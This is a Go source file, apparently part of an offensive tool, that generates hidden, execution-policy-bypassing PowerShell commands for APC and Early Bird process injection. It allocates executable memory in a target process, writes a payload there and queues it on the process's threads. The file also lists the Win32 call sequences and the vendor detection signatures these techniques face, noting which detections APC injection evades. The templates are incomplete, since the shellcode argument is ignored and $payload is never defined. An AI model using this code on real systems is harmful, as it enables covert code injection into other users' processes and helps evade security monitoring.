package processinjection

import "fmt"

func InjectAPC(targetPID int, shellcode []byte) (string, error) {
	if targetPID <= 0 {
		return "", fmt.Errorf("invalid target PID: %d", targetPID)
	}
	if len(shellcode) == 0 {
		return "", fmt.Errorf("empty shellcode")
	}
	_ = shellcode
	return fmt.Sprintf(
		`-NoP -NonI -W Hidden -Exec Bypass -C `+
			`"$p=Get-Process -Id %d; `+
			`$h=[PoshWin32.Kernel32]::OpenProcess(0x001F0FFF,$false,$p.Id); `+
			`$addr=[PoshWin32.Kernel32]::VirtualAllocEx($h,0,0x1000,0x3000,0x40); `+
			`[PoshWin32.Kernel32]::WriteProcessMemory($h,$addr,$payload,$payload.Length,[ref]0); `+
			`$p.Threads|ForEach-Object{$t=[PoshWin32.Kernel32]::OpenThread(0x001F03FF,$false,$_.Id);`+
			`[PoshWin32.Kernel32]::QueueUserAPC($addr,$t,0)}"`,
		targetPID,
	), nil
}

func InjectAPCToAllThreads(targetPID int, shellcode []byte) (string, error) {
	if targetPID <= 0 {
		return "", fmt.Errorf("invalid target PID: %d", targetPID)
	}
	if len(shellcode) == 0 {
		return "", fmt.Errorf("empty shellcode")
	}
	_ = shellcode
	return fmt.Sprintf(
		`-NoP -NonI -W Hidden -Exec Bypass -C `+
			`"$snapshot=[PoshWin32.Kernel32]::CreateToolhelp32Snapshot(0x00000004,0); `+
			`$te=New-Object PoshWin32.THREADENTRY32; $te.dwSize=[System.Runtime.InteropServices.Marshal]::SizeOf($te); `+
			`[PoshWin32.Kernel32]::Thread32First($snapshot,[ref]$te); `+
			`while([PoshWin32.Kernel32]::Thread32Next($snapshot,[ref]$te)){`+
			`if($te.th32OwnerProcessID -eq %d){`+
			`$t=[PoshWin32.Kernel32]::OpenThread(0x001F03FF,$false,$te.th32ThreadID);`+
			`[PoshWin32.Kernel32]::QueueUserAPC($addr,$t,0);`+
			`[PoshWin32.Kernel32]::CloseHandle($t)}}"`,
		targetPID,
	), nil
}

func InjectEarlyBird(processPath string, shellcode []byte) (string, error) {
	if processPath == "" {
		return "", fmt.Errorf("empty process path")
	}
	if len(shellcode) == 0 {
		return "", fmt.Errorf("empty shellcode")
	}
	_ = shellcode
	return fmt.Sprintf(
		`-NoP -NonI -W Hidden -Exec Bypass -C `+
			`"$si=New-Object System.Diagnostics.ProcessStartInfo; `+
			`$si.FileName='%s'; $si.WindowStyle=[System.Diagnostics.ProcessWindowStyle]::Hidden; `+
			`$si.CreateNoWindow=$true; $si.UseShellExecute=$false; `+
			`$p=[System.Diagnostics.Process]::Start($si); `+
			`$p.Suspend(); `+
			`$h=$p.Handle; `+
			`$addr=[PoshWin32.Kernel32]::VirtualAllocEx($h,0,0x1000,0x3000,0x40); `+
			`[PoshWin32.Kernel32]::WriteProcessMemory($h,$addr,$payload,$payload.Length,[ref]0); `+
			`$t=$p.Threads|Select-Object -First 1; `+
			`$ht=[PoshWin32.Kernel32]::OpenThread(0x001F03FF,$false,$t.Id); `+
			`[PoshWin32.Kernel32]::QueueUserAPC($addr,$ht,0); `+
			`$p.Resume()"`,
		processPath,
	), nil
}

func APCAPIMap() map[int]string {
	return map[int]string{
		1: "CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0) -> hSnapshot",
		2: "Thread32First(hSnapshot, &te) / Thread32Next(hSnapshot, &te) -> iterate threads",
		3: "OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID) -> hProcess",
		4: "VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) -> lpRemoteAddr",
		5: "WriteProcessMemory(hProcess, lpRemoteAddr, lpBuffer, dwSize, NULL)",
		6: "OpenThread(THREAD_ALL_ACCESS, FALSE, threadID) -> hThread",
		7: "QueueUserAPC(lpRemoteAddr, hThread, 0)",
		8: "CloseHandle(hThread)",
	}
}

func EarlyBirdAPIMap() map[int]string {
	return map[int]string{
		1: "CreateProcess(targetPath, ..., CREATE_SUSPENDED, ..., &pi) -> creates process in suspended state",
		2: "VirtualAllocEx(pi.hProcess, NULL, dwSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) -> lpRemoteAddr",
		3: "WriteProcessMemory(pi.hProcess, lpRemoteAddr, lpBuffer, dwSize, NULL)",
		4: "QueueUserAPC(lpRemoteAddr, pi.hThread, 0) -> queued but not executed until ResumeThread",
		5: "ResumeThread(pi.hThread) -> thread starts, enters alertable state, executes APC",
	}
}

func APCDetectionSignatures() map[string]string {
	return map[string]string{
		"Sysmon EventID 8":     "CreateRemoteThread NOT generated by QueueUserAPC - this is why APCs evade this detection",
		"Sysmon EventID 10":    "ProcessAccess detected for OpenProcess calls",
		"EventID 4688":         "Process Creation for Early Bird variant",
		"ETW Microsoft-Windows-Kernel-Process": "Thread create/delete events may show abnormal thread activity",
		"CrowdStrike Falcon":   "CS detects APC injection via kernel APC queue callbacks and unusual thread scheduling",
		"SentinelOne":          "S1 detects via QueueUserAPC hook in ntdll and unusual APC queuing patterns",
		"Microsoft Defender":   "MDE detects via ETW events for QueueUserAPC with shellcode-sized allocations",
	}
}
